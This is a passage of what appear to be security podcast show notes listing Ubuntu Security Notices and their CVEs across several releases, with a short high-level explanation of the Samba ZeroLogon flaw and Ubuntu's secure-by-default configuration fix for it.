<h3 id="usn-4510-1-usn-4510-2-samba-vulnerability">[<a href="https://usn.ubuntu.com/4510-1/">USN-4510-1</a>, <a href="https://usn.ubuntu.com/4510-2/">USN-4510-2</a>] Samba vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-1472">CVE-2020-1472</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>&ldquo;ZeroLogon&rdquo;</li>
<li>Would allow an attacker who already can communicate with the domain
controller to reset it&rsquo;s password and so then take control of the DC and
obtain the domain admin&rsquo;s credentials</li>
<li>Flaw in the NetLogon protocol would allow the attacker to impersonate any
computer in the domain, even the DC itself, and execute calls on that
computer&rsquo;s behalf</li>
<li>This flaw was in the cryptographic authentication scheme employed by
the NetLogon protocol</li>
<li>Samba also implements this protocol - and so contained the same flaw</li>
<li>In both cases (Window AD vs Samba) there is an option to use a more
secure authentication mechanism - for older Ubuntu releases like Trusty,
Xenial and Bionic the default configuration as specified by upstream
Samba did not enforce the use of this bu default</li>
<li>So the fix is a simple configuration change to enable this by default</li>
<li>This is done by patching Samba directly (rather than trying to say update
everyone&rsquo;s deployed /etc/samba.conf or similar) - which still allows a
local admin to turn this off if they so desire (although this is
definitely not recommended)</li>
<li>One example of how Ubuntu tries to be secure by default - when known
better security configuration options become available we try and enable
them (whilst weighing up the likelihood of breaking existing installs -
we try very hard not to do this)</li>
<li>Similarly we have done the same for the various spec exec mitigations -
almost all default to on even at the expense of a performance hit in that
case</li>
</ul>
<h3 id="usn-4504-1-openssl-vulnerabilities">[<a href="https://usn.ubuntu.com/4504-1/">USN-4504-1</a>] OpenSSL vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-1563">CVE-2019-1563</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1551">CVE-2019-1551</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-1547">CVE-2019-1547</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-1968">CVE-2020-1968</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4505-1-phpmailer-vulnerability">[<a href="https://usn.ubuntu.com/4505-1/">USN-4505-1</a>] PHPMailer vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-13625">CVE-2020-13625</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4506-1-mcabber-vulnerability">[<a href="https://usn.ubuntu.com/4506-1/">USN-4506-1</a>] MCabber vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-9928">CVE-2016-9928</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4507-1-ncmpc-vulnerability">[<a href="https://usn.ubuntu.com/4507-1/">USN-4507-1</a>] ncmpc vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-9240">CVE-2018-9240</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4508-1-storebackup-vulnerability">[<a href="https://usn.ubuntu.com/4508-1/">USN-4508-1</a>] StoreBackup vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-7040">CVE-2020-7040</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4509-1-perl-dbi-module-vulnerabilities">[<a href="https://usn.ubuntu.com/4509-1/">USN-4509-1</a>] Perl DBI module vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2014-10401">CVE-2014-10401</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2013-7490">CVE-2013-7490</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4511-1-qemu-vulnerability">[<a href="https://usn.ubuntu.com/4511-1/">USN-4511-1</a>] QEMU vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14364">CVE-2020-14364</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4512-1-util-linux-vulnerability">[<a href="https://usn.ubuntu.com/4512-1/">USN-4512-1</a>] util-linux vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-7738">CVE-2018-7738</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4513-1-apng2gif-vulnerability">[<a href="https://usn.ubuntu.com/4513-1/">USN-4513-1</a>] apng2gif vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-6960">CVE-2017-6960</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4514-1-libproxy-vulnerability">[<a href="https://usn.ubuntu.com/4514-1/">USN-4514-1</a>] libproxy vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25219">CVE-2020-25219</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4515-1-pure-ftpd-vulnerability">[<a href="https://usn.ubuntu.com/4515-1/">USN-4515-1</a>] Pure-FTPd vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-9274">CVE-2020-9274</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4516-1-gnupg-vulnerability">[<a href="https://usn.ubuntu.com/4516-1/">USN-4516-1</a>] GnuPG vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14855">CVE-2019-14855</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4518-1-xawtv-vulnerability"><a href="https://usn.ubuntu.com/4518-1/">USN-4518-1</a>] xawtv vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-13696">CVE-2020-13696</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4519-1-pulseaudio-vulnerability">[<a href="https://usn.ubuntu.com/4519-1/">USN-4519-1</a>] PulseAudio vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15710">CVE-2020-15710</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4520-1-exim-spamassassin-vulnerability">[<a href="https://usn.ubuntu.com/4520-1/">USN-4520-1</a>] Exim SpamAssassin vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19920">CVE-2019-19920</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4521-1-pam-tacplus-vulnerability">[<a href="https://usn.ubuntu.com/4521-1/">USN-4521-1</a>] pam_tacplus vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-13881">CVE-2020-13881</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4522-1-novnc-vulnerability">[<a href="https://usn.ubuntu.com/4522-1/">USN-4522-1</a>] noVNC vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-18635">CVE-2017-18635</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4523-1-libofx-vulnerability">[<a href="https://usn.ubuntu.com/4523-1/">USN-4523-1</a>] LibOFX vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9656">CVE-2019-9656</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4524-1-tnef-vulnerabilities">[<a href="https://usn.ubuntu.com/4524-1/">USN-4524-1</a>] TNEF vulnerabilities</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18849">CVE-2019-18849</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4525-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/4525-1/">USN-4525-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25212">CVE-2020-25212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16166">CVE-2020-16166</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12888">CVE-2020-12888</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19054">CVE-2019-19054</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18808">CVE-2019-18808</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4526-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/4526-1/">USN-4526-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-16166">CVE-2020-16166</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14356">CVE-2020-14356</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12888">CVE-2020-12888</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9445">CVE-2019-9445</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19074">CVE-2019-19074</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19073">CVE-2019-19073</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19067">CVE-2019-19067</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19061">CVE-2019-19061</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19054">CVE-2019-19054</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18808">CVE-2019-18808</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4527-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/4527-1/">USN-4527-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25212">CVE-2020-25212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0067">CVE-2020-0067</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9453">CVE-2019-9453</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9445">CVE-2019-9445</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20811">CVE-2019-20811</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19074">CVE-2019-19074</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19073">CVE-2019-19073</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19054">CVE-2019-19054</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4528-1-ceph-vulnerabilities">[<a href="https://usn.ubuntu.com/4528-1/">USN-4528-1</a>] Ceph vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-1760">CVE-2020-1760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12059">CVE-2020-12059</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10753">CVE-2020-10753</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4529-1-freeimage-vulnerabilities">[<a href="https://usn.ubuntu.com/4529-1/">USN-4529-1</a>] FreeImage vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12213">CVE-2019-12213</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12211">CVE-2019-12211</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4531-1-busybox-vulnerability">[<a href="https://usn.ubuntu.com/4531-1/">USN-4531-1</a>] BusyBox vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1000500">CVE-2018-1000500</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4530-1-debian-lan-vulnerabilities">[<a href="https://usn.ubuntu.com/4530-1/">USN-4530-1</a>] Debian-LAN vulnerabilities</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-3467">CVE-2019-3467</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4532-1-netty-vulnerabilities">[<a href="https://usn.ubuntu.com/4532-1/">USN-4532-1</a>] Netty vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-20445">CVE-2019-20445</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20444">CVE-2019-20444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16869">CVE-2019-16869</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4533-1-ltsp-display-manager-vulnerabilities">[<a href="https://usn.ubuntu.com/4533-1/">USN-4533-1</a>] LTSP Display Manager vulnerabilities</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-20373">CVE-2019-20373</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4534-1-perl-dbi-module-vulnerability">[<a href="https://usn.ubuntu.com/4534-1/">USN-4534-1</a>] Perl DBI module vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-20919">CVE-2019-20919</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4535-1-rdflib-vulnerability">[<a href="https://usn.ubuntu.com/4535-1/">USN-4535-1</a>] RDFLib vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-7653">CVE-2019-7653</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4537-1-aptdaemon-vulnerability">[<a href="https://usn.ubuntu.com/4537-1/">USN-4537-1</a>] Aptdaemon vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15703">CVE-2020-15703</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4538-1-packagekit-vulnerabilities">[<a href="https://usn.ubuntu.com/4538-1/">USN-4538-1</a>] PackageKit vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-16122">CVE-2020-16122</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16121">CVE-2020-16121</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4536-1-spip-vulnerabilities">[<a href="https://usn.ubuntu.com/4536-1/">USN-4536-1</a>] SPIP vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-16393">CVE-2019-16393</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19830">CVE-2019-19830</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15736">CVE-2017-15736</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16391">CVE-2019-16391</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11071">CVE-2019-11071</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16394">CVE-2019-16394</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16392">CVE-2019-16392</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4539-1-awl-vulnerability">[<a href="https://usn.ubuntu.com/4539-1/">USN-4539-1</a>] AWL vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11728">CVE-2020-11728</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4540-1-atftpd-vulnerabilities">[<a href="https://usn.ubuntu.com/4540-1/">USN-4540-1</a>] atftpd vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11366">CVE-2019-11366</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11365">CVE-2019-11365</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4542-1-miniupnpd-vulnerabilities">[<a href="https://usn.ubuntu.com/4542-1/">USN-4542-1</a>] MiniUPnPd vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12111">CVE-2019-12111</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12110">CVE-2019-12110</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12109">CVE-2019-12109</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12108">CVE-2019-12108</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12107">CVE-2019-12107</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4543-1-sanitize-vulnerability">[<a href="https://usn.ubuntu.com/4543-1/">USN-4543-1</a>] Sanitize vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-4054">CVE-2020-4054</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4541-1-gnuplot-vulnerabilities">[<a href="https://usn.ubuntu.com/4541-1/">USN-4541-1</a>] Gnuplot vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-19492">CVE-2018-19492</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19491">CVE-2018-19491</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19490">CVE-2018-19490</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4545-1-libquicktime-vulnerabilities">[<a href="https://usn.ubuntu.com/4545-1/">USN-4545-1</a>] libquicktime vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-9125">CVE-2017-9125</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9128">CVE-2017-9128</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9127">CVE-2017-9127</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9126">CVE-2017-9126</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9124">CVE-2017-9124</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9123">CVE-2017-9123</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9122">CVE-2017-9122</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4546-1-firefox-vulnerabilities">[<a href="https://usn.ubuntu.com/4546-1/">USN-4546-1</a>] Firefox vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15678">CVE-2020-15678</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15677">CVE-2020-15677</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15676">CVE-2020-15676</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15675">CVE-2020-15675</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15674">CVE-2020-15674</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15673">CVE-2020-15673</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-3968-3-sudo-vulnerabilities">[<a href="https://usn.ubuntu.com/3968-3/">USN-3968-3</a>] Sudo vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-7032">CVE-2016-7032</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-7076">CVE-2016-7076</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4549-1-imagemagick-vulnerabilities">[<a href="https://usn.ubuntu.com/4549-1/">USN-4549-1</a>] ImageMagick vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19949">CVE-2019-19949</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19948">CVE-2019-19948</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4548-1-libuv-vulnerability">[<a href="https://usn.ubuntu.com/4548-1/">USN-4548-1</a>] libuv vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8252">CVE-2020-8252</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4547-1-italc-vulnerabilities">[<a href="https://usn.ubuntu.com/4547-1/">USN-4547-1</a>] iTALC vulnerabilities</h3>
<ul>
<li>12 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-7225">CVE-2018-7225</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20750">CVE-2018-20750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20749">CVE-2018-20749</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20748">CVE-2018-20748</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20024">CVE-2018-20024</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20023">CVE-2018-20023</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20022">CVE-2018-20022</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20021">CVE-2018-20021</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20020">CVE-2018-20020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20019">CVE-2018-20019</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15127">CVE-2018-15127</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15681">CVE-2019-15681</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4553-1-teeworlds-vulnerability">[<a href="https://usn.ubuntu.com/4553-1/">USN-4553-1</a>] Teeworlds vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12066">CVE-2020-12066</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4552-1-pam-python-vulnerability">[<a href="https://usn.ubuntu.com/4552-1/">USN-4552-1</a>] Pam-python vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-16729">CVE-2019-16729</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4550-1-dpdk-vulnerabilities">[<a href="https://usn.ubuntu.com/4550-1/">USN-4550-1</a>] DPDK vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14378">CVE-2020-14378</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14377">CVE-2020-14377</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14376">CVE-2020-14376</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14375">CVE-2020-14375</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14374">CVE-2020-14374</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4551-1-squid-vulnerabilities">[<a href="https://usn.ubuntu.com/4551-1/">USN-4551-1</a>] Squid vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-24606">CVE-2020-24606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15811">CVE-2020-15811</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15810">CVE-2020-15810</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15049">CVE-2020-15049</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4554-1-libpgf-vulnerability">[<a href="https://usn.ubuntu.com/4554-1/">USN-4554-1</a>] libPGF vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2015-6673">CVE-2015-6673</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4547-2-ssvnc-vulnerabilities">[<a href="https://usn.ubuntu.com/4547-2/">USN-4547-2</a>] SSVNC vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-20024">CVE-2018-20024</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-2024">CVE-2018-2024</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20022">CVE-2018-20022</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20021">CVE-2018-20021</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20020">CVE-2018-20020</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4556-1-netqmail-vulnerabilities">[<a href="https://usn.ubuntu.com/4556-1/">USN-4556-1</a>] netqmail vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS)
<ul>
